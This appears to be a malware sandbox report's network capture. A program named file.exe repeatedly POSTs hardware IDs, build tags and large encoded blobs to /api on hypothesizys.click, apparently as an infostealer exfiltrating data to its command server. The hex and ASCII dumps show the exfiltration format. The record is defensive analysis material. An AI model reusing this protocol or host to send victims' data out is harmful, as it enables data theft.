                                                                                                                  2024-12-23 13:28:04 UTC1369INData Raw: 47 4c 6c 63 77 31 47 37 53 38 49 62 45 68 6e 36 61 4d 36 4b 4f 33 57 49 54 36 5a 61 57 49 4d 53 58 49 6b 30 42 66 68 6d 2b 43 42 72 72 72 6c 51 46 55 73 50 49 56 2f 32 61 58 38 4d 2f 6b 6e 72 64 4d 6b 4d 4e 4e 6e 38 6b 66 41 65 69 75 42 46 57 68 4f 6f 35 79 73 72 76 63 4d 78 6e 30 38 6d 54 78 49 4d 2f 6f 78 2b 72 72 73 46 50 65 6e 41 76 63 33 32 4a 78 68 63 51 55 5a 75 67 32 6a 46 44 31 38 35 39 32 56 4f 72 79 63 76 46 68 6a 4b 4b 46 6f 71 69 69 51 64 6e 36 5a 61 6d 4b 4d 43 50 45 68 46 46 32 6d 42 48 5a 52 62 75 6c 79 69 34 46 75 50 78 71 76 6d 62 58 69 64 66 73 36 34 73 4d 33 74 77 62 31 73 51 43 49 64 79 61 51 57 2b 33 59 75 74 49 73 71 72 62 4b 41 50 33 38 6d 54 78 49 4d 2f 6f 78 65 72 72 73 46 50 65 6e 41 76 63 33 32 4a 78 68 63 51 55 5a 75 67 32 6a
                                                                                                                  Data Ascii: GLlcw1G7S8IbEhn6aM6KO3WIT6ZaWIMSXIk0Bfhm+CBrrrlQFUsPIV/2aX8M/knrdMkMNNn8kfAeiuBFWhOo5ysrvcMxn08mTxIM/ox+rrsFPenAvc32JxhcQUZug2jFD18592VOrycvFhjKKFoqiiQdn6ZamKMCPEhFF2mBHZRbulyi4FuPxqvmbXidfs64sM3twb1sQCIdyaQW+3YutIsqrbKAP38mTxIM/oxerrsFPenAvc32JxhcQUZug2j
                                                                                                                  2024-12-23 13:28:05 UTC1369INData Raw: 48 4b 42 6e 33 74 57 69 52 49 5a 6d 7a 31 2b 72 72 75 41 4c 47 68 46 71 45 6c 44 6f 74 31 64 68 42 59 36 46 76 67 67 61 37 36 35 56 34 46 66 4b 69 4a 37 34 68 77 37 61 5a 71 75 75 72 44 49 65 45 54 63 37 63 5a 47 79 53 68 67 59 68 35 6d 6a 50 56 4b 65 74 7a 69 34 58 76 34 77 55 6e 44 53 49 6f 4a 54 6d 6d 72 6c 47 69 4e 46 59 6e 6f 4d 4a 48 50 2b 47 51 57 6d 6c 62 66 31 51 74 71 76 44 50 31 53 32 38 6a 4c 78 66 73 2b 64 68 61 4f 37 74 77 4c 51 68 46 66 4f 33 48 63 76 77 4a 4e 57 65 75 6f 6f 31 6b 48 31 74 49 4d 68 56 4f 37 79 63 75 4a 6f 7a 36 4c 58 2f 4f 76 7a 54 4a 50 46 57 49 43 48 4a 54 44 55 6c 31 42 36 34 52 48 79 61 36 65 73 33 54 74 57 79 62 38 75 70 7a 4f 4d 6f 4a 43 61 6c 5a 6c 51 6d 64 52 59 7a 4b 67 77 4c 39 36 71 65 45 36 33 4b 4e 77 45 6b 36
                                                                                                                  Data Ascii: HKBn3tWiRIZmz1+rruALGhFqElDot1dhBY6Fvgga765V4FfKiJ74hw7aZquurDIeETc7cZGyShgYh5mjPVKetzi4Xv4wUnDSIoJTmmrlGiNFYnoMJHP+GQWmlbf1QtqvDP1S28jLxfs+dhaO7twLQhFfO3HcvwJNWeuoo1kH1tIMhVO7ycuJoz6LX/OvzTJPFWICHJTDUl1B64RHya6es3TtWyb8upzOMoJCalZlQmdRYzKgwL96qeE63KNwEk6


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  2192.168.2.449732104.21.95.2354436956C:\Users\user\Desktop\file.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-23 13:28:06 UTC280OUTPOST /api HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Content-Type: multipart/form-data; boundary=F9TYHS8EEI2Z7I
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                  Content-Length: 18140
                                                                                                                  Host: hypothesizys.click
                                                                                                                  2024-12-23 13:28:06 UTC15331OUTData Raw: 2d 2d 46 39 54 59 48 53 38 45 45 49 32 5a 37 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 38 33 45 36 41 33 33 38 42 35 34 36 39 35 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 46 39 54 59 48 53 38 45 45 49 32 5a 37 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 46 39 54 59 48 53 38 45 45 49 32 5a 37 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 69 73 4f 54 5a 2d 2d 74 65 73 74 65 72 0d 0a 2d 2d 46 39 54 59 48 53 38
                                                                                                                  Data Ascii: --F9TYHS8EEI2Z7IContent-Disposition: form-data; name="hwid"883E6A338B54695CAC8923850305D13E--F9TYHS8EEI2Z7IContent-Disposition: form-data; name="pid"2--F9TYHS8EEI2Z7IContent-Disposition: form-data; name="lid"VisOTZ--tester--F9TYHS8
                                                                                                                  2024-12-23 13:28:06 UTC2809OUTData Raw: 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61
                                                                                                                  Data Ascii: ~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECa
                                                                                                                  2024-12-23 13:28:07 UTC1132INHTTP/1.1 200 OK
                                                                                                                  Date: Mon, 23 Dec 2024 13:28:07 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Set-Cookie: PHPSESSID=t6no89n77f69urbdk3c1bku7o5; expires=Fri, 18 Apr 2025 07:14:46 GMT; Max-Age=9999999; path=/
                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                  Pragma: no-cache
                                                                                                                  X-Frame-Options: DENY
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  vary: accept-encoding
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KFrT3Mmz1Ko%2BY6vytlXto7xJrm7V5CmCWtBjljmfgoQL2J1AYnesfe37nWMuDuWGk7IA5CGLOfK1WtMgUYQVdcLwQ2SSkPbU4ApFh%2FojVwZ4TIXpW%2BSqvjs7yNgC1ATIrMKZb0s%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8f68b1627f4b0f6d-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1497&min_rtt=1493&rtt_var=568&sent=13&recv=22&lost=0&retrans=0&sent_bytes=2845&recv_bytes=19100&delivery_rate=1910994&cwnd=239&unsent_bytes=0&cid=3f4f1fd6a95d5999&ts=1020&x=0"
                                                                                                                  2024-12-23 13:28:07 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                  2024-12-23 13:28:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  3192.168.2.449733104.21.95.2354436956C:\Users\user\Desktop\file.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-23 13:28:08 UTC273OUTPOST /api HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Content-Type: multipart/form-data; boundary=S6XMD7B3
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                  Content-Length: 8725
                                                                                                                  Host: hypothesizys.click
                                                                                                                  2024-12-23 13:28:08 UTC8725OUTData Raw: 2d 2d 53 36 58 4d 44 37 42 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 38 33 45 36 41 33 33 38 42 35 34 36 39 35 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 53 36 58 4d 44 37 42 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 53 36 58 4d 44 37 42 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 69 73 4f 54 5a 2d 2d 74 65 73 74 65 72 0d 0a 2d 2d 53 36 58 4d 44 37 42 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69
                                                                                                                  Data Ascii: --S6XMD7B3Content-Disposition: form-data; name="hwid"883E6A338B54695CAC8923850305D13E--S6XMD7B3Content-Disposition: form-data; name="pid"2--S6XMD7B3Content-Disposition: form-data; name="lid"VisOTZ--tester--S6XMD7B3Content-Disposi
                                                                                                                  2024-12-23 13:28:09 UTC1127INHTTP/1.1 200 OK
                                                                                                                  Date: Mon, 23 Dec 2024 13:28:09 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Set-Cookie: PHPSESSID=v210vl3shua7lskptkc951psb1; expires=Fri, 18 Apr 2025 07:14:48 GMT; Max-Age=9999999; path=/
                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                  Pragma: no-cache
                                                                                                                  X-Frame-Options: DENY
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  vary: accept-encoding
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Uq3hDhB9rMABnHKCyTUHsemku%2BhB8glV5B3X2wicYXI91Pz5gMNoKrwGuorSQ7CZC1k1453tK1HiSJbGnbVQEjHpEoUzfnIhxUoWHCui0tHxKrduT%2BrHSiINOhfyC346RxdjnkE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8f68b170fac6c341-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1695&min_rtt=1689&rtt_var=647&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2845&recv_bytes=9656&delivery_rate=1674311&cwnd=177&unsent_bytes=0&cid=0ebd4c8624b0dc9b&ts=810&x=0"
                                                                                                                  2024-12-23 13:28:09 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                  2024-12-23 13:28:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  4192.168.2.449734104.21.95.2354436956C:\Users\user\Desktop\file.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-23 13:28:11 UTC279OUTPOST /api HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Content-Type: multipart/form-data; boundary=LDIO675GWNWWP
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                  Content-Length: 20408
                                                                                                                  Host: hypothesizys.click
                                                                                                                  2024-12-23 13:28:11 UTC15331OUTData Raw: 2d 2d 4c 44 49 4f 36 37 35 47 57 4e 57 57 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 38 33 45 36 41 33 33 38 42 35 34 36 39 35 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4c 44 49 4f 36 37 35 47 57 4e 57 57 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4c 44 49 4f 36 37 35 47 57 4e 57 57 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 69 73 4f 54 5a 2d 2d 74 65 73 74 65 72 0d 0a 2d 2d 4c 44 49 4f 36 37 35 47 57 4e
                                                                                                                  Data Ascii: --LDIO675GWNWWPContent-Disposition: form-data; name="hwid"883E6A338B54695CAC8923850305D13E--LDIO675GWNWWPContent-Disposition: form-data; name="pid"3--LDIO675GWNWWPContent-Disposition: form-data; name="lid"VisOTZ--tester--LDIO675GWN
                                                                                                                  2024-12-23 13:28:11 UTC5077OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: lrQMn 64F6(X&7~`aO
                                                                                                                  2024-12-23 13:28:12 UTC1137INHTTP/1.1 200 OK
                                                                                                                  Date: Mon, 23 Dec 2024 13:28:12 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Set-Cookie: PHPSESSID=it079ul69m3pephmii0f7kbb35; expires=Fri, 18 Apr 2025 07:14:51 GMT; Max-Age=9999999; path=/
                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                  Pragma: no-cache
                                                                                                                  X-Frame-Options: DENY
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  vary: accept-encoding
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vc8y9U1AaaigRmDufKvYErPmxiW%2BWanLoGqJrb1h%2FOoKH%2FcD4xyJXW4R8bs1C7iIGXNFmCTOBEG9hlo%2FIAI84m1KJyCvu3v3XFnf86kKotswXuJYoQ%2FRfXHIyrYUM6XkG%2Fb42MA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8f68b1808cf97c69-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1982&min_rtt=1975&rtt_var=755&sent=15&recv=25&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21367&delivery_rate=1435594&cwnd=171&unsent_bytes=0&cid=5a0ad5a8ae99b9e2&ts=969&x=0"
                                                                                                                  2024-12-23 13:28:12 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                  2024-12-23 13:28:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  5192.168.2.449735104.21.95.2354436956C:\Users\user\Desktop\file.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-23 13:28:14 UTC273OUTPOST /api HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Content-Type: multipart/form-data; boundary=S4I50N14
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                  Content-Length: 1203
                                                                                                                  Host: hypothesizys.click
                                                                                                                  2024-12-23 13:28:14 UTC1203OUTData Raw: 2d 2d 53 34 49 35 30 4e 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 38 33 45 36 41 33 33 38 42 35 34 36 39 35 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 53 34 49 35 30 4e 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 53 34 49 35 30 4e 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 69 73 4f 54 5a 2d 2d 74 65 73 74 65 72 0d 0a 2d 2d 53 34 49 35 30 4e 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69
                                                                                                                  Data Ascii: --S4I50N14Content-Disposition: form-data; name="hwid"883E6A338B54695CAC8923850305D13E--S4I50N14Content-Disposition: form-data; name="pid"1--S4I50N14Content-Disposition: form-data; name="lid"VisOTZ--tester--S4I50N14Content-Disposi
                                                                                                                  2024-12-23 13:28:15 UTC1126INHTTP/1.1 200 OK
                                                                                                                  Date: Mon, 23 Dec 2024 13:28:14 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Set-Cookie: PHPSESSID=7ik347hv469mv4vln86llj0uqc; expires=Fri, 18 Apr 2025 07:14:53 GMT; Max-Age=9999999; path=/
                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                  Pragma: no-cache
                                                                                                                  X-Frame-Options: DENY
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  vary: accept-encoding
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t7yudrPKqr7nuJh6tgfE3P8m57R%2BhfCKO8tNPBuVwDOgJT%2FkMoAuKPH38I8nguMekbqVpk3oQRpCl37T4GtJvHQ29ekYevM1aF5FSjKoizPYoabCRtNmpxF5UoSHLoYOkpHtRqk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8f68b1924b964264-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1591&min_rtt=1588&rtt_var=603&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=2112&delivery_rate=1804697&cwnd=223&unsent_bytes=0&cid=790b964b303f439d&ts=764&x=0"
                                                                                                                  2024-12-23 13:28:15 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                  2024-12-23 13:28:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  6192.168.2.449736104.21.95.2354436956C:\Users\user\Desktop\file.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-23 13:28:16 UTC276OUTPOST /api HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Content-Type: multipart/form-data; boundary=KR1XF4FP3
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                  Content-Length: 572666
                                                                                                                  Host: hypothesizys.click
                                                                                                                  2024-12-23 13:28:16 UTC15331OUTData Raw: 2d 2d 4b 52 31 58 46 34 46 50 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 38 33 45 36 41 33 33 38 42 35 34 36 39 35 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 4b 52 31 58 46 34 46 50 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4b 52 31 58 46 34 46 50 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 69 73 4f 54 5a 2d 2d 74 65 73 74 65 72 0d 0a 2d 2d 4b 52 31 58 46 34 46 50 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73
                                                                                                                  Data Ascii: --KR1XF4FP3Content-Disposition: form-data; name="hwid"883E6A338B54695CAC8923850305D13E--KR1XF4FP3Content-Disposition: form-data; name="pid"1--KR1XF4FP3Content-Disposition: form-data; name="lid"VisOTZ--tester--KR1XF4FP3Content-Dis
                                                                                                                  2024-12-23 13:28:16 UTC15331OUTData Raw: 36 e2 f0 37 58 9c 71 f9 ff 8c 00 f2 90 0a 3c f2 db 10 dc 0f e2 0c a9 b9 7e 80 99 cb 07 4e c3 01 91 21 38 ee 51 d9 5a 07 bf 99 fd 98 0d c5 90 95 62 5e 94 2f 7d 76 2d e5 77 de 54 cb 08 04 ed e5 db 73 d6 fa 40 6b db 25 ef e7 71 5e cf ab 45 3c 3d 70 84 36 f1 e6 68 8d 06 2e c7 bd 26 59 2d ff f2 0f fc 40 98 24 ba f5 3e 85 b9 c8 9e f9 f2 d7 b6 76 2c a5 3c 4e c1 3c ef 1b ee 8c 66 7a a3 8f 32 e8 7c 42 0f 7c af 5c ab 24 12 c6 36 73 de 5d 1a b4 6a da c9 ef 41 53 4e 86 98 a4 2c 5f 6d 5f fc 5b 0c 47 24 a8 de 44 2c 4c 48 dc d6 8c 1e 35 95 cb ea 0f 43 e4 4d 2e 5f 07 db 9c ef 96 f6 5f e5 ab fb f8 73 40 d2 d2 08 73 e2 b4 f3 ae 27 a9 a8 ff 50 6c 5d 85 d2 b5 16 6a 06 95 e2 86 7e 23 94 8f 49 f2 39 93 f8 cc ec b4 d6 d5 15 c8 a9 1d 49 ab c2 6b 11 22 83 de ce 18 23 e6 27 2e de
                                                                                                                  Data Ascii: 67Xq<~N!8QZb^/}v-wTs@k%q^E<=p6h.&Y-@$>v,<N<fz2|B|\$6s]jASN,_m_[G$D,LH5CM.__s@s'Pl]j~#I9Ik"#'.
                                                                                                                  2024-12-23 13:28:16 UTC15331OUTData Raw: 88 9a 9a 42 49 30 54 1c 62 0a 31 66 73 f1 60 db 8e 7f b5 58 6a 5d 04 62 90 fe 3b 72 7d fe 25 48 9a f9 ef 10 eb dc 6c 0d 6f 40 23 21 01 c4 29 f2 ff 35 68 5a aa bf 4f d4 04 22 e0 30 86 77 72 cf ee 3e 20 bd 9f a6 8a c0 f1 f5 eb fb 64 1b 65 92 a1 ea d5 9d 75 fd 72 95 52 60 b1 f1 06 e4 2b fa 2c fd b8 9a 68 fb 47 f4 95 ec fb bc 3d 7f 01 45 30 ae 9e f0 f3 f8 9f b6 82 c8 3a e4 40 8b b7 fe 20 48 c1 65 c6 f8 f4 28 44 0b 47 07 c0 c7 16 54 8a 38 f2 eb ba 1a 9e b8 ab 06 4c c2 6e c2 03 4e 10 11 7c 98 8a 78 4d 2a d0 f2 c8 dd db a0 b3 25 7f 8a 54 3c 5f bb 86 2f 35 49 ef 49 45 8c 94 90 b9 4c 58 09 d8 3b c0 22 26 ee 23 79 73 0a 98 11 48 20 7b f5 78 32 bf 7e 23 5d 02 9a d0 ae 25 37 a8 d7 51 e2 57 91 de b7 12 82 89 97 94 9b e0 a5 12 98 77 56 3d 57 d4 7a f1 96 e9 f1 60 25 25
                                                                                                                  Data Ascii: BI0Tb1fs`Xj]b;r}%Hlo@#!)5hZO"0wr> deurR`+,hG=E0:@ He(DGT8LnN|xM*%T<_/5IIELX;"&#ysH {x2~#]%7QWwV=Wz`%%
